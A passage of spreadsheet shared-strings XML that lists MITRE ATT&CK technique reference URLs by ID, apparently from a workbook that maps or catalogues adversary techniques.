    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1070/005</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1070/006</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1202</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1105</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1490</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1056</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1056/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1056/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1056/003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1056/004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1559</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1559/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1559/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1534</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1570</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1036</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1036/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1036/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1036/003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1036/004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1036/005</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1036/006</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1036/007</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1556</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1556/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1556/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1556/003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1556/004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1578</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1578/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1578/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1578/003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1578/004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1112</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1601</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1601/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1601/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1104</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1106</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1599</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1599/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1498</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1046</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1498/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1498/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1135</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1040</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1095</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1571</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1027</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1027/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1027/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1027/003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1027/004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1027/005</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1027/006</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1588</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1588/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1588/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1588/003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1588/004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1588/005</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1588/006</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1137</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1137/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1137/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1137/003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1137/004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1137/005</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1137/006</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1003/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1003/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1003/003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1003/004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1003/005</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1003/006</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1003/007</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1003/008</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1201</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1120</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1069</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1069/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1069/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1069/003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1566</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1566/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1566/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1566/003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1598</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1598/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1598/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1598/003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1542</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1542/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1542/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1542/003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1542/004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1542/005</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1057</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1055</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1055/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1055/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1055/003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1055/004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1055/005</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1055/008</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1055/009</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1055/011</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1055/012</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1055/013</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1055/014</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1572</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1090</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1090/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1090/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1090/003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1090/004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1012</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1620</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1219</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1563</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1563/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1563/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1021</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1021/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1021/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1021/003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1021/004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1021/005</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1021/006</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1018</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1091</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1496</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1207</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1014</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1053</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1053/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1053/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1053/003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1053/004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1053/005</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1053/006</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1053/007</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1029</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1113</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1597</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1597/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1597/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1596/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1596/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1596/003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1596/004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1596/005</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1593</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1593/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1593/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1594</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1505</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1505/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1505/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1505/003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1505/004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1489</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1129</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1218</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1218/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1218/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1218/003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1218/004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1218/005</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1218/007</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1218/008</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1218/009</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1218/01</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1218/011</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1218/012</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1218/013</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1218/014</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1216</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1216/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1072</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1518</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1518/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1608</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1608/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1608/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1608/003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1608/004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1608/005</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1528</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1558</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1558/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1558/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1558/003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1558/004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1539</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1553</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1553/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1553/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1553/003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1553/004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1553/005</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1553/006</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1195</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1195/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1195/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1195/003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1082</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1614</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1614/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1016</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1016/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1049</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1033</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1007</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1569</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1569/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1569/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1529</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1124</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1080</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1205</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1205/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1537</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1127</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1127/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1199</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1111</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1552</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1552/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1552/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1552/003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1552/004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1552/005</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1552/006</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1552/007</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1535</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1550</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1550/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1550/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1550/003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1550/004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1204</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
